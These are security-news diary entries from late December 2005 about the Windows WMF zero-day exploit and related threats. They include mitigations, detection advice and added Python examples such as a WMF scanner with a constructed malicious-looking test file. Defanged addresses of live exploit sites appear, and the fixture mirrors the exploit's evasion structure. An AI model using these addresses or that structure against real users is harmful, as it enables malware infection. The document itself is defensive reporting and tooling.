Published: 2005-12-31

* New exploit released for the WMF vulnerability - YELLOW

On New Year's eve the defenders got a 'nice' present from the full disclosure community.

The source code claims to be made by the folks at Metasploit and X-Force, together with an anonymous source.
The exploit generates files:
  • with a random size;
  • without a .wmf extension (.jpg in this case, but it could be any other image extension);
  • with a random piece of junk in front of the bad call, carefully crafted to be larger than the MTU of an Ethernet network;
  • using one of a number of possible calls to trigger the exploit, which are listed in the source;
  • with a random trailer.
From a number of scans we did through VirusTotal, we can safely conclude there is currently no anti-virus signature working for it. Similarly, it is very unlikely that any of the current IDS signatures work for it.

Judging from the source code, it will likely be difficult to develop very effective signatures due to the structure of WMF files.

Wishing all Windows machines a happy New Year, with a bit fewer nasty exploits.

Considering this upsets all the defenses people have in place, we voted to go to yellow in order to warn the good guys out there that they need to review their defenses.

Swa Frantzen


Published: 2005-12-31

New IM Worm Exploiting WMF Vulnerability

We have received information that a new IM worm is hitting the Netherlands. Apparently the worm is spreading over MSN using a malformed WMF file called "xmas-2006 FUNNY.jpg".

Kaspersky Lab Blogs

Be very careful when opening the New Year's greetings that you receive, folks. We wouldn't want you to have to spend the rest of your holiday weekend rebuilding your computer.

Thanks to Juha-Matti for providing the information.


Published: 2005-12-31

From extreme to in depth

Warning: some might get offended by some of the initial thoughts in this story. Please read to the end before venting your frustration.

I'm also not trying to bash Microsoft. If I were, I'd have borrowed the subject of a spam message I got recently: "forget microsoft, get big and hard". I'm just trying to show how you can get from an extreme line of reasoning to a workable solution that protects those assets that need protection.

Suppose you defend a place that has high to very high security needs and wants to avoid the WMF issue at all costs. Reasons to do this should be based on a risk assessment, but elements that might lead to such extreme conditions include:
  • No patch in sight from Microsoft
  • Not wanting to infect peers such as customers
  • Not wanting to rely on anti-virus signatures when people are developing versions of the exploit with a highly random nature
  • Not wanting to rely on IDS devices due to the same randomness and the "it's too late already" aspect
Suppose you are basically not capable of accepting the risk associated with the WMF vulnerability, almost no matter what you break. In such a case you have two big avenues to walk:
  • Ban Microsoft products in your environment
    • I told you we were going to start from the extreme viewpoint, so hold your horses.
    • What does it buy?
      • No Windows, no Windows WMF vulnerability.
    • What does it not buy?
      • You can still pass dangerous payloads on to others, such as your customers.
      • If a single machine escaped the ban or snuck back in, you might still be affected.
  • Ban all communication and/or file exchanges
    • Extreme again, isn't it? Moreover, it is very hard to do in a modern world.
    • What does it buy you?
      • You prevent yourself from receiving dangerous payloads from, or passing them on to, any peer.
    • What does it not buy you?
      • If a single file sneaks in, or is present already, you might still have a major problem.
      • You have sacrificed a lot of availability to gain confidentiality and/or integrity.
With those extreme paths in mind, think about which parts of them can help in your setup and with your risk assessment.

Most of our readers do not have the extreme "at all cost" risk situations.

Most of us have a situation where we have a business, and the business must continue to operate. In such a business, however, you will identify (if you look for it) areas that need more protection and are willing to sacrifice more for that protection than other parts of the same business. That difference in need for protection is what you can work with.

E.g.: suppose the accounting department is considered sensitive and, based on the risk analysis performed, worthy of more extreme measures than other departments.

What could I try to do to use some of the very extreme ideas and build a safer solution for them now and in the next weeks?
  • Isolate them from the rest of the company. Plug a firewall between them and the rest of the internal networks. Disallow all unneeded communication with the rest of the company, making sure their servers are on their new inside.
  • Use advanced networking solutions to prevent (accidental) hookup of unauthorized equipment to the sensitive network. E.g.:
    • Make sure switch ports automatically shut down when they try to learn a second MAC address
    • Assign only DHCP addresses to known MAC addresses
    • Kick unknown MAC addresses into a separate VLAN
    • Use layer 2 measures (such as private VLANs) to prevent client-to-client communication
  • Disallow dangerous usage:
    • Disallow IM
    • Disallow web surfing
    • Disallow email, or strip all attachments from the more secure email server they get access to.
  • Now, no surfing, no email, etc. can be hard on users, and they might have very good arguments for getting the functionality back.
    • Build a second less sensitive network on different infrastructure
    • Add machines for those that need the web/email/...
    • Allow them to surf the web (with traditional restrictions) on those "less" secure machines but not on the "sensitive" machines, which are to be used exclusively for their sensitive application(s).
    • Be very procedural and build the needed infrastructure if you want to allow transfers between the two environments.
  • The more traditional stuff should not be forgotten, especially not on the more secure side:
    • Take a tough stance on updating Anti-virus signatures
    • Look at unregistering the DLL as per Microsoft's suggestion
    • Maybe consider an unofficial patch from some reputable source
  • Look for other platforms
    • This is hard, as training users to switch platforms takes time, and, worse, applications might not have properly working clients for other platforms. Still, it's one way out of the de facto monoculture of operating systems and their related vulnerabilities. We know from agriculture that monoculture has risks; if we do not want to accept those risks, we need to act on them.
  • Look for other strongholds to build
    • If you have more than one sensitive section in your company, build more of these strongholds, not larger ones.
    • More, smaller strongholds contain the spread of infections better and keep the associated risks and clean-up costs under control.
So basically I'm back to a defense in depth approach which, compared to medieval defenses, is the equivalent of not trying to build a huge wall around the whole city, because it's too much of a hassle and too costly, but instead building a city with a somewhat flimsy wooden palisade and a big, sturdy donjon for the few nobles we have, even at the cost of some discomfort in the process.
Add to that that each family of nobles gets its own donjon, so as not to risk all nobles being wiped out in one go should disease strike the city.

Swa Frantzen


Published: 2005-12-31

2006 Predictions

On December 27th, I asked for predictions for 2006. Here is what we got. Many thanks to all of you who responded. Now let's see how close these guys are.

From Dan:

You asked for them...


Below is a list of some of the topics we may be seeing in the New Year:

* Web-borne worms

Not a lot of these around yet. Myspace and some other online sites were infected, but with the mass amounts of exploits for Web scripting languages and un-patched machines this is bound to happen.

* RSS malcode

Great technology. As more browsers embed this and include exploits, the frequent / unattended nature of RSS will be used to infect.

* Trojans outpace worms

We already are starting to see this. New Trojans and variants of Trojans are coming out daily in volume.

* Voice-over-IP Phishing (Vishing)

Somebody had to come up with another name :-). Using Voice over the Internet could introduce another means to deceive unsuspecting users into doing something they should not.

* Toxic Blogs

Yes, blogs are everywhere. Including here. Fact is that most of them do not check for scrupulous scripting, scan their file posts, and allow active content in posts.

* Xbot 360

The Xbox connecting over the Internet for updates and other things leads me to believe that this will simply be another way for attackers to use your PC and your connection at home for their own purposes.

* Cross Site scripting attacks

High-profile ecommerce and financial websites have had (and will have) cross site scripting vulnerabilities. Attackers will leverage these for Phishing, Trojan Downloaders and for other nefarious reasons more frequently.

From Jeremy:

I believe that one of the biggest threats is going to be insecure databases. The proof of concept database worm that was released about a month or so ago is just the very beginning of what we will see over the next year+. To me this is a very real problem as I have audited environments where there was a huge focus on securing hosts and servers, but zero or minimal focus on securing the database.

From Jim:

My 2006 predictions/paranoid phobias:

  1. "Zero-Day" exploits that are discovered and exploited by The Bad Guys, with no one being the wiser until it is far, far too late;
  2. Tightly-targeted malware (currently being used) that, once it gleans information from financial institutions, allows the attacker(s) to then completely trash the entire information store, causing panic/chaos (if only for the targeted company(s));
  3. Hackers taking the Fed's recent announcement that "the Internet is not vulnerable to widespread attack" as a personal challenge.

Again, thanks to the contributors.


Published: 2005-12-31

Leap Second

Just a reminder that tonight is one of those special times when we see some strange things. One of those things is the fact that 12-31-2005 23:59:60 UTC is not the same as 01-01-2006 00:00:00 UTC (the leap second is inserted just before midnight UTC), but most OSes can't handle a 61-second minute. So when reviewing your logs next Tuesday morning, remember to cross-reference the times. If you use NTP to sync machine times, your clock should gradually adjust back to the correct time and you'll probably never notice.
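The cross-referencing problem described above, as an added example (not ISC code): the usual Python parser rejects a 23:59:60 timestamp outright, and POSIX time has no slot for the extra second, so a host that kept a 61-second minute and one that did not produce timestamps that only line up once both are folded onto the POSIX time line. The log lines and host names are constructed for the demonstration.

```python
"""Cross-referencing UTC log timestamps across the 2005-12-31 leap second."""
import calendar
import time
from datetime import datetime

FMT = "%Y-%m-%d %H:%M:%S"


def strict_parse_ok(ts):
    """True if datetime.strptime accepts ts; it raises ValueError for second == 60."""
    try:
        datetime.strptime(ts, FMT)
        return True
    except ValueError:
        return False


def to_epoch(ts):
    """Parse a UTC timestamp, accepting :60, and fold it onto POSIX time.

    time.strptime allows %S up to 61; calendar.timegm simply adds the seconds,
    so 23:59:60 lands on the same value as 00:00:00 of the next day.
    """
    return calendar.timegm(time.strptime(ts, FMT))


def correlate(lines):
    """Return (epoch, is_leap_second, message) per line so two hosts' logs can be aligned."""
    out = []
    for line in lines:
        ts, msg = line[:19], line[20:]
        out.append((to_epoch(ts), ts.endswith(":60"), msg))
    return out


# Constructed log lines: hostA inserted the leap second, hostB stepped straight to midnight.
LOG_LINES = [
    "2005-12-31 23:59:59 hostA sshd: session opened",
    "2005-12-31 23:59:60 hostA sshd: session closed",
    "2006-01-01 00:00:00 hostB kernel: clock stepped",
]

if __name__ == "__main__":
    for epoch, leap, msg in correlate(LOG_LINES):
        print(epoch, "(leap second)" if leap else "", msg)
```

Entries flagged as leap seconds share an epoch value with the following second, so order them by their position in the file, not by the converted time.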


Published: 2005-12-31

NOT a Quiet Day

On December 27th, when I did the diary, I commented on how quiet it had been. Well, it appears the quiet has ended and I perhaps jinxed us. The question is: how many of the new computers taken out of the box and connected to the Net have been fully updated, patched and AV protected? How many new computers are being protected by a firewall of some type?

I purchased new computers for my grown, married children and their families for Christmas. They each had really old hand-me-downs and it was time to get them up to date. My daughter and her husband didn't even have an email address of their own; they came to my house and used mine. So for Christmas I decided to give their families something they could really use.

Before those machines even made it under the tree, they were completely updated. (That is what I spent late Christmas Eve doing.) I installed a software firewall program and antivirus program on them as well as AdAware and Spybot. I uninstalled all of the junk programs that the vendor had put on the machines (Kazaa Lite, etc.). Their email was set up and all of the updates were done. They have been instructed on running scans and making sure that the live update is running. I have instructed them on what not to do (open unsolicited emails, click on links or attachments from unsolicited emails), don't download, stay out of chat rooms, etc.

I contacted them yesterday and reminded them not to open ANY attachments or links in any email that they were not specifically expecting. And to stay out of the IMs.

Here's hoping that this will keep them safe for the next few days. How about you? Have you adequately protected your computer? Do you have a current AV program with updated defs? Do you have a firewall?

Have a Happy New Year everyone.


Published: 2005-12-31

WMF and Indexing

WMF Indexing, White Elephants and White Rabbits

The WMF White Elephant in the room as far as I'm concerned is Indexing. YMMV. How many Vendors have other Indexing services installed that are going to automagically enable WMF exploitation on or across your network?

F-Secure pointed out the White Elephant when they recommended you "disable indexing of media files (or get rid of Google Desktop) if you're handling infected files under Windows" and said "This is enough to invoke the exploit and infect the machine. This all happens in realtime as Google Desktop contains a file system filter and will index new files in realtime." And I agree: turn all indexing off until a fix is out.

Microsoft, Google and other vendors should immediately address what the role is of their indexing services, particularly as it relates to shares, synchronization and potential mitigation activities. Their lack of comment on this issue is glaring.

MS Indexing (White Rabbit Link)

F-Secure's blog today has a new vulnerability workaround (unrelated to indexing).


Published: 2005-12-31

Call 1-866-727-2338 for free virus and security-related support from Microsoft

Preparation for the Inevitable (and New Year's Resolution?)

When your family and friends inevitably ask for help to "clean" their systems exploited by malicious WMF (or other) attacks, refer them to MS's free phone support.

Microsoft's No-Charge support phone number for virus and other security-related issue support is 1-866-727-2338, and "is available 24 hours a day for the U.S. and Canada."

"Outside of the U.S. and Canada", click here and then select your region to obtain the free support phone number for virus and other security-related issues.


Published: 2005-12-30

Ethereal Security Issue

While catching up on email from the past week, I noticed a security issue that has fallen by the wayside in the midst of all of the 0-day exploit discussion. On Tuesday, Ethereal released a security advisory which discusses problems with 3 of its dissectors. Of particular note, the IRC dissector can go into an infinite loop. As you, our loyal readers, have probably already noted mentally, the IRC dissector is a fairly important one, as we eavesdrop on botnets that primarily use IRC as their command and control channel.

It is possible that one could run arbitrary code through the vulnerability with the OSPF dissector, but more likely you will just have Ethereal crash or use up all available system resources.

The new version is available at http://www.ethereal.com/download.html .

Scott Fendley
Handler on Duty


Published: 2005-12-30

phpBB 2.0.19 released

phpBB 2.0.19 has been released.

It looks like it's upgrade time for those of us running a phpBB forum. XSS and dictionary attacks against forum users seem to be on the menu.

Stay tuned for more details.

Swa Frantzen


Published: 2005-12-30

Musings and More WMF Information

Websense released some more information about their investigation into some website exploitation that involves IFRAMEs and the WMF vulnerability. My fellow handler Lorna said recently, "IFrames are always suspect in my eyes." In light of this information, I have to agree with her. Take a look at the Websense Security Labs website for details of their investigation, including a nice movie file showing the exploitation at work.

As a side note,  I am quite thankful that most university and K-12 schools are still on holiday until next week.  This will hopefully give enough lead time for the mass media to report on this issue, and maybe, just maybe, Microsoft will have a better solution for the home users and our student populations.  *crossing his fingers that MS will release a preliminary update quickly*

One reader sent us the following summary, which pretty nicely outlines the issues with this vulnerability:

  1. Filename extension filtering will not work.
  2. Even if you un-register the DLL, some programs may re-register it by invoking it (shimgvw.dll) directly.
  3. You have to delete or rename the DLL to protect yourself. However, remember to undo this once there is a patch.
  4. While images embedded into documents may not immediately trigger the exploit, they may once saved into their own file.
The reader goes on to note that whatever mitigation is offered in Microsoft's advisory is not much more than a quick temporary band-aid. What we need is a patch, and we need it quickly.

Scott Fendley
Handler on Duty


Published: 2005-12-30

Lotus Notes Vulnerable to WMF 0-Day Exploit

John Herron at NIST.org discovered today that Lotus Notes versions 6.x and higher are vulnerable to the WMF 0-day exploit. In the advisory, located on the NIST website here, John reports that Lotus Notes remained vulnerable even after running the regsvr32 workaround in the Microsoft security advisory.


Published: 2005-12-30

More WMF Signatures

Frank Knobbe from bleedingsnort.com sent us some new and improved rules for the WMF exploit. As you can tell by the various iterations we went through, a lot of work went into these rules.

First a couple notes about these rules:

In its simplest case, you may want to limit the rules to port 80 (or $HTTP_PORTS, which typically maps to ports used by web servers). But realize that this only works if you block access to other ports at your firewall. Otherwise, it's trivial to just run a web server on an odd port and link to the image on the odd port.

Here is the rule developed by the Bleedingsnort team:
(to avoid copy/paste issues, see the bleedingsnort CVS repository)


Published: 2005-12-29

Resolution(s) For The New Year

As the end of the year is often a time of reflection, let me take a moment to put aside the technical nature of what we all do and offer some of my recent thoughts.

I'll be the first to admit, there are things I can do much better than I have been and I'd wager that most people reading this believe there is at least one security related thing that they can do better as well.

If you have not already done so, take a few moments to think about what you could do better.  We all understand the realities of budgets, office politics and the other factors we often complain about daily and lay blame on for an inability to do [insert whatever here], and we understand that many things will not change despite how much we wish them to.

Think of one thing that you can (realistically) do better next year to make the systems you are responsible for safer, more secure and just as usable and then make a plan to make it happen.

You don't have to send your resolutions in to us, but at some point next year, I'll put the question to you as to whether you kept your resolution or not.

If you insist on sharing, or want to send your resolution to someone thinking that you might be more inclined to keep it if someone else knows, send them to me at isc dot chris at gee mail dot com.  If I have enough and see any patterns emerge I'll write about it when I am again on duty next month.


Published: 2005-12-29

* Back to Green

As it has been 24 hours since we elevated the Infocon to yellow in response to the WMF 0-day exploit, we will be lowering the Infocon level to Green.

An advisory has been released by Microsoft, working snort signatures are available and as a result of raising the Infocon to yellow yesterday, awareness of the issue has been raised appropriately.

Moving to green signifies that no -new- significant threats are currently being tracked and is not intended to imply that the threat level today is any less than it was yesterday. See Infocon Levels for more information.  Administrators and others responsible for system security are encouraged to act appropriately if no action or incomplete actions have been taken at this time.


Published: 2005-12-29

Bleeding Snort Sigs Available

Snort sigs to detect the WMF exploit are available at Bleeding-Edge Snort

Thanks Matt, Frank and everyone else who has submitted signatures!


Published: 2005-12-29

Microsoft Advisory

Microsoft has issued a security advisory on the WMF vulnerability.

Details are available here


Published: 2005-12-29

* Update on Windows WMF 0-day

From Daniel's diary entry yesterday ...

Update 19:07 UTC: We are moving to Infocon Yellow for a bit. There has been some debate among the handlers about this step, but considering that a lot of people are on holidays and might otherwise miss the WMF 0-day problem, we have decided to raise the alert level.

The folks at Websense Labs have a nice movie of what it looks like when a system gets exploited by this WMF 0-day, see http://www.websensesecuritylabs.com/images/alerts/wmf-movie.wmv . Don't go to any of the URLs visible in the movie unless you know what you are doing (or feel like spending the next hours reinstalling your PC).

The original exploit site (unionseek.com) is no longer up. But the exploit is being served from various sites all over by now; see the F-Secure Blog at http://www.f-secure.com/weblog/ for an update on the versions of the exploit found in the wild.

Working exploit code is widely available, and has also been published by FRSIRT and the Metasploit Framework.

Regarding DEP (Data Execution Prevention) on XP SP2: the default DEP settings will not prevent this exploit from working. Comments we have received in the meantime suggest that if you enable DEP to cover all programs (as documented on Microsoft TechNet), the WMF exploit attempt will result in a warning and not run on its own. Don't feel too safe though; we have also received comments stating that a fully enabled DEP did not help at all in their case.

While the original exploit only referred to the Microsoft Picture and Fax Viewer, current information is that any application which automatically displays or renders WMF files is vulnerable to the problem. This includes Google Desktop, if the indexing function finds one of the exploit WMFs on the local hard drive; see the F-Secure Weblog mentioned above for details.

Update 23:00 UTC: The vulnerability seems to be within SHIMGVW.DLL. Unregistering this DLL (type REGSVR32 /U SHIMGVW.DLL at the command prompt or in the "Start->Run" window, then reboot) will resolve most of the vulnerability, but will also break your Windows "Picture and Fax Viewer", as well as the ability of programs like "Paint" and "Explorer" to display thumbnails of any picture and real (benign) WMF files.

Update 23:19 UTC: Not that we didn't have enough "good" news already, but if you are relying on perimeter filters to block files with WMF extension from reaching your browser, you might have a surprise waiting for you. Windows XP will detect and process a WMF file based on its content ("magic bytes") and not rely on the extension alone, which means that a WMF sailing in disguise with a different extension might still be able to get you.
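Both the New Year's Eve note on the exploit generator (random size, spoofed extension, oversized junk before the bad call, random trailer) and this note on magic-byte detection point to the same defensive step: identify WMF files by content, not name, and walk their records. The following is an added example, not ISC code and not derived from the exploit source; the header and record layouts are from the public Windows Metafile format, the sample files and names (chart.wmf, greeting.jpg, photo.jpg) are constructed here, and the fact that the exploited code path is the Escape sub-function SETABORTPROC is from the public vulnerability details rather than from this diary.

```python
"""Content-based WMF identification with Escape-record flagging.

Layout (public WMF format): optional 22-byte placeable header with magic
0x9AC6CDD7, an 18-byte META_HEADER, then records of
<u32 size in 16-bit words><u16 function><params> ending with META_EOF.
"""
import struct

PLACEABLE_MAGIC = b"\xd7\xcd\xc6\x9a"   # 0x9AC6CDD7 little-endian
PLACEABLE_LEN = 22
META_HEADER_LEN = 18
META_EOF = 0x0000
META_SETMAPMODE = 0x0103
META_ESCAPE = 0x0626
SETABORTPROC = 0x0009   # Escape sub-function on the exploited path (public detail, not from the diary)


def wmf_header_offset(data):
    """Offset of the META_HEADER if data is a WMF by content, else None. The name is ignored."""
    off = PLACEABLE_LEN if data[:4] == PLACEABLE_MAGIC else 0
    if len(data) < off + META_HEADER_LEN:
        return None
    mtype, hdr_words, version = struct.unpack_from("<HHH", data, off)
    # Type 1 = memory, 2 = disk; header is always 9 words; version 0x0100 or 0x0300.
    if mtype in (1, 2) and hdr_words == 9 and version in (0x0100, 0x0300):
        return off
    return None


def iter_records(data, off):
    """Yield (function, params) per record up to META_EOF; raise on an impossible size."""
    pos = off + META_HEADER_LEN
    while pos + 6 <= len(data):
        size_words, func = struct.unpack_from("<IH", data, pos)
        size = size_words * 2
        if size < 6 or pos + size > len(data):
            raise ValueError("record at offset %d has size %d" % (pos, size))
        yield func, data[pos + 6:pos + size]
        if func == META_EOF:
            return          # a random trailer after EOF is never parsed
        pos += size


def scan(name, data):
    """Classify one file; the extension is deliberately not trusted."""
    result = {"name": name, "is_wmf": False, "escapes": [], "malformed": False, "suspicious": False}
    off = wmf_header_offset(data)
    if off is None:
        return result
    result["is_wmf"] = True
    try:
        for func, params in iter_records(data, off):
            if func == META_ESCAPE and len(params) >= 2:
                result["escapes"].append(struct.unpack_from("<H", params)[0])
    except ValueError:
        result["malformed"] = True
    # Escape records are rare in real images; any Escape or a broken record is worth quarantining.
    result["suspicious"] = bool(result["escapes"]) or result["malformed"]
    return result


# --- constructed test material, not real files -----------------------------------
def _record(func, params=b""):
    if len(params) % 2:
        params += b"\x00"   # sizes are in 16-bit words, so pad odd params
    return struct.pack("<IH", (6 + len(params)) // 2, func) + params


def build_wmf(records, placeable=True):
    body = b"".join(records)
    header = struct.pack("<HHHIHIH", 1, 9, 0x0300, (META_HEADER_LEN + len(body)) // 2,
                         0, max(len(r) for r in records) // 2, 0)
    if placeable:
        # handle, bounding box (4 x int16), inch, reserved, checksum (not verified here)
        header = PLACEABLE_MAGIC + struct.pack("<HhhhhHIH", 0, 0, 0, 100, 100, 96, 0, 0) + header
    return header + body


BENIGN = build_wmf([_record(META_SETMAPMODE, struct.pack("<H", 8)), _record(META_EOF)])

# Disguised sample: .jpg name, no placeable header, an oversized filler record (the
# "junk larger than the MTU" idea; its function code is arbitrary), an Escape record,
# and a random-looking trailer after EOF.
DISGUISED = build_wmf([
    _record(META_SETMAPMODE, struct.pack("<H", 8)),
    _record(0x0B41, b"\x00" * 2000),
    _record(META_ESCAPE, struct.pack("<HH", SETABORTPROC, 0)),
    _record(META_EOF),
], placeable=False) + b"\x13\x37" * 20

SAMPLES = [("chart.wmf", BENIGN), ("greeting.jpg", DISGUISED),
           ("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 40)]   # JPEG magic, not a WMF

if __name__ == "__main__":
    for fname, blob in SAMPLES:
        r = scan(fname, blob)
        print("%-12s wmf=%-5s escapes=%s malformed=%s suspicious=%s" % (
            fname, r["is_wmf"], [hex(e) for e in r["escapes"]], r["malformed"], r["suspicious"]))
```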


Published: 2005-12-29

* Windows WMF 0-day exploit in the wild

From Daniel's diary entry yesterday ...

Just when we thought that this would be another slow day, a link to a working exploit for an unpatched vulnerability in what looks like the Windows Graphics Rendering Engine has been posted to Bugtraq.

The posted URL is   [ uni on seek. com/   d/t    1/  wmf_exp.  htm ]
(DON'T GO HERE UNLESS YOU KNOW WHAT YOU'RE DOING. Added spaces to avoid accidental clicking. See Firefox note below!!)

The HTML file loads a WMF (Windows Meta File) which executes a trojan dropper on a fully patched Windows XP SP2 machine. The dropper will then download Winhound, a fake anti-spyware/virus program which asks the user to purchase a registered version of the software in order to remove the reported threats.

During the test Johannes ran, it was interesting that the DEP (Data Execution Prevention) on his system stopped this from working. However, as this was tested on an AMD64 machine, we still have to confirm whether (or not) software DEP also stops this; let us know if you tested this.

Internet Explorer will automatically launch the "Windows Picture and Fax Viewer". Note that Firefox users are not totally immune either. In my install of Firefox, a dialog box will ask me if I would like to load the image in "Windows Picture and Fax Viewer". If I allow this to happen ("pictures are safe after all" NOT!), the exploit will execute.

UPDATE - According to F-Secure's blog "Firefox users can get infected if they decide to run or download the image file."

For more information, see also http://secunia.com/advisories/18255/ , http://vil.mcafeesecurity.com/vil/content/v_137760.htm and http://www.securityfocus.com/bid/16074/info


Published: 2005-12-28

The most hated IP address of 2005 ?

Time for a little hall of shame. Is there any IP address range or individual IP address that was annoying the daylights out of you in 2005? An address where you tried and tried to contact the ISP to have a malware site, botnet controller or exploit page removed, but to no avail? Where exploits kept coming back again and again? Let us know, and we might share your story. For starters, here is mine:

Most Hated Netblock: 195.225.176.x - 195.225.177.x (AS31159)
Provider: Netcathost, Kiev, Ukraine
Reason for claim to fame: Hosting exploits, browser hijackers and CoolWebSearch related annoyances for several months. Ignoring, bouncing, or rejecting any complaints to the abuse contacts.

Update: beehappyy.biz is being implicated in the currently ongoing WMF 0-day exploit mania. And guess what beehappyy.biz resolves to? My favorite netblock again. Null-routing, anyone?


Published: 2005-12-28

Searching money, finding exploit

Every now and then, when using completely benign search terms in Google and others, the results that come out on top range from "not nice" to "outright hostile". We've received a report from a user who was looking for "money", and what he got presented with was a link to hxxp://hyipgoldinvest.com (don't click). The site is booby-trapped with an exploit variant of MS05-054 that is not yet detected by AV. Conclusion: careful what you click on. A URL returned by a search engine is not necessarily more trustworthy than one that you receive in a spam message that offers "che ap replcia wathces".


Published: 2005-12-28

Possible IM attack gearing up.

We have received a few emails today advising us that users are receiving popups while on IM. These popups try to convince you to click on a link that is purported to be MyPictures. It apparently attempts to install a version of SDBot.

Remember - Don't click on links in IM - ever.  A dog is not a dog in IM.  And Aunt Sally probably is not really Aunt Sally.


Published: 2005-12-27

Handlers On Duty

Today Donald and I are tag teaming as Handler On Duty, so you are likely to see stories with a wide range of topics. Thanks Donald for tag teaming with me today.


Published: 2005-12-27

What will 2006 have in store?

Well, 2005 is soon to come to a close. What a tremendous year this has been! We have had lots of exciting discussions about everything from "soup to nuts". Looking back we have seen new exploits, new holes in the Internet and the usual round of viruses and worms. I was the Handler On Duty on New Year's Eve 2004 and asked our readers who checked in with us to tell us what they thought 2005 was going to bring. Here is a recap of some of the responses that were received:

From Greg:
    With the developing trends in botnets and denial of service with them, I'm willing to bet that we'll see more frequent use of ddos for hire and malware distribution by zombie pcs. It also would be a shock to see an adaptive botnet..that can change and adapt to discovery on the fly..shutting down discovered nodes and such.

From John:
    As direct electronic invoicing becomes more popular, criminals will try to leverage poor implementations of Web Services to submit fraudulent invoices for payment. Agencies that have done away with support staff necessary for manual invoice processing will pay dearly.

From David:
    I can't think of a new 'technical' threat but the existing technology joy-ride hackers are using could end up being more dangerous in the near future. Currently when we find a hacked system it is normally being used to share copyrighted music, movies or applications. They mainly want to use our disk space and bandwidth and have no dangerous agenda. This could change in the future, however. As financial institutions tighten up security the money motivated hackers may turn to using BotNets to harvest documents. Instead of hijacking a system to use the disk space and setup detectable FTP servers they may end up harvesting all of the documents from the system in hopes of gaining financial or personal information for identity theft. Pretty scary to even think about it.

From Jack:
    DNS Poisoning/Hijacking

From Anonymous:
    Just thought I'd add some of the potential issues that we might start seeing in 2005. First, is the spread of bots to IP enabled devices. Once more as devices reach that "on-line all the time" state, the vulnerabilities will be exploited more. This could include a range of devices from cellular phones, to even the next generation console systems. (Note: viruses and exploits for console systems may deserve to be its own potential issue). Second, an increase of malware for alternative operating systems (non-Windows), primarily for the Tiger OS. Third, IPv6 will become wider spread, and while it will be a partial remedy for some security issues; improper implementation will create added security risks and issues -- primarily in the areas of content management/filtering, simpler facilitation of cryptographic malware, and brand new vulnerabilities for IPv6 enabled products.

So what do you think? How did our predictors do for 2005? What do you think were the biggest issues for 2005? I will be the Handler On Duty on New Year's Eve and will print some of the responses we receive.

What are your predictions for 2006?  Let us know. Your response could be used in a Diary next year.


Published: 2005-12-27

Quiet Weekend - not much news

It has been a very quiet weekend, so not much exciting news. Perhaps all of the script kiddies got new computers for Christmas and haven't gotten them fully up to speed yet. Or perhaps many of their rogue machines were also replaced by new ones this year and they will have to go out and rebuild their army. At any rate, whichever is the case, we here at the Storm Center appreciate the break.


Published: 2005-12-26

Evolutions in the honeypot/honeynet arena

Over the past days we have received some interesting links on the collection of malware using new variations on the honeypot theme.

Traditionally a honeypot was a (somewhat) vulnerable system that you let get infected in order to learn something from it. This newer breed is more of an automated system to catch malware without getting the system infected.

mwcollect (http://www.mwcollect.org/) is an automated downloader of malware. Georg Wicherski, mwcollect head developer, sent us some collected samples from his setup, and I must say I'm still impressed by the number of samples he's sent us since then.

Along the same lines is nepenthes (http://nepenthes.sourceforge.net/) a system that emulates known vulnerabilities in order to catch the exploits thrown at it.

Fellow handler Daniel Wesemann suggested a look at the Argos system (http://www.few.vu.nl/~porto/argos/), designed to detect arbitrary control flow and arbitrary code execution attacks. It is built on top of QEMU for the emulation of x86 processors.  I have one big gripe about the approach, and that is this comment in the QEMU FAQ (quoting):
Q: "I want to set up a honeypot. Can I use QEMU for that purpose ?"
A: "It is possible, but the QEMU code has not been reviewed for security issues."

With recent vulnerabilities in the commonly used VMware and the trend of malware detecting VMware and debugging, great care is needed regarding the quality and security of these tools. So my suggestion would be to carefully inspect the source code of any of these before deciding to deploy it, even for a test run.

There are for sure more efforts in this arena, I'm just summarizing what we received recently.
As always, use these systems at your own risk.

Collecting all these samples is however just the first step. Somebody needs to analyze them, and with the increase of malware that race might be tough on some. See also Kevin Liston's article on Dasher.
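To make the "catch without getting infected" idea concrete, here is an added example (not from the diary, and not code from mwcollect, nepenthes or Argos) of the collection core of a low-interaction honeypot reduced to the part that is safe by construction: it records what a client sends, files it by SHA-256 so repeated samples are counted rather than stored twice, and never parses or executes the bytes. The byte cap, the timeout and the payloads in `main` are constructed for the example.

```python
"""Minimal capture-only honeypot core (added example, not project code)."""
import hashlib
import socket
import socketserver
import threading
import time
from pathlib import Path

MAX_BYTES = 64 * 1024   # assumption: cap per connection, keeps the store bounded
READ_TIMEOUT = 2.0      # assumption: give up on a silent client after 2 s


class SampleStore:
    """Content-addressed sample store. With root=None samples stay in memory;
    with a directory each new sample is written once as <sha256>.bin."""

    def __init__(self, root=None):
        self.root = Path(root) if root else None
        if self.root:
            self.root.mkdir(parents=True, exist_ok=True)
        self.hits = {}      # sha256 -> number of times received
        self.samples = {}   # sha256 -> bytes (kept for later analysis)
        self.log = []       # (timestamp, peer, size, sha256, "new"|"dup")

    def ingest(self, data, peer="unknown"):
        """Record one captured payload; returns (digest, is_new)."""
        digest = hashlib.sha256(data).hexdigest()
        is_new = digest not in self.hits
        self.hits[digest] = self.hits.get(digest, 0) + 1
        if is_new:
            self.samples[digest] = data
            if self.root:
                (self.root / f"{digest}.bin").write_bytes(data)
        self.log.append((time.time(), peer, len(data), digest, "new" if is_new else "dup"))
        return digest, is_new


def make_handler(store):
    """Build a handler that only reads: it sends nothing back and runs nothing."""
    class Capture(socketserver.BaseRequestHandler):
        def handle(self):
            self.request.settimeout(READ_TIMEOUT)
            buf = b""
            try:
                while len(buf) < MAX_BYTES:
                    chunk = self.request.recv(4096)
                    if not chunk:
                        break
                    buf += chunk
            except socket.timeout:
                pass          # partial data is still worth keeping
            if buf:
                ip, port = self.client_address[:2]
                store.ingest(buf[:MAX_BYTES], f"{ip}:{port}")
    return Capture


def serve(store, host="127.0.0.1", port=0):
    """Start the listener in a background thread; port=0 picks a free port."""
    srv = socketserver.ThreadingTCPServer((host, port), make_handler(store))
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    # Loopback demonstration with constructed payloads: A is sent twice.
    store = SampleStore()
    srv = serve(store)
    host, port = srv.server_address
    for payload in (b"constructed-sample-A", b"constructed-sample-A", b"constructed-sample-B"):
        with socket.create_connection((host, port)) as c:
            c.sendall(payload)
    time.sleep(0.5)
    srv.shutdown()
    for entry in store.log:
        print(entry)
```

The point of the design is the asymmetry: the listener never answers, so it cannot be used as a reflector, and the store only ever hashes and writes bytes, so a sample cannot "go off" during collection. Analysis, the hard part the diary points at, happens elsewhere on the stored files.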

